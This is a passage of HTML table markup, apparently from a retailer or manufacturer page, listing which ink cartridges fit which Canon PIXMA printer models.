(Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-755XXL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MG2570S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MG2577S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745XL (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\"><tbody><tr align=\"center\"><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MG3570</td><td>CL-741 (Colour)</td></tr><tr><td>CL-741XL (Colour)</td></tr><tr><td>PG-740 (Pigment Black)</td></tr><tr><td>PG-740/CL-741 Value Pack</td></tr><tr><td>PG-740XL (Pigment Black)</td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MG3670</td><td>CL-741 (Colour)</td></tr><tr><td>CL-741XL (Colour)</td></tr><tr><td>PG-740 (Pigment Black)</td></tr><tr><td>PG-740/CL-741 Value Pack</td></tr><tr><td>PG-740XL (Pigment Black)</td></tr><tr><td rowspan=\"10\" align=\"center\">PIXMA MG7570</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Gray)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Gray)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP160</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP170</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP180</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MP228</td><td>CL-41 (Colour)</td></tr><tr><td>CL-831 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td>PG-830 (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP237</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP245</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP258</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP276</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr></tbody></table><table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n    <tr>\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"170\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP287</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP460</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP476</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-831 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-830 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP486</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP496</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP497</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP500</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"4\" align=\"center\">PIXMA MP520</td>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP530</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP568</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP600</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n  </tbody>\n</table>\n<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td 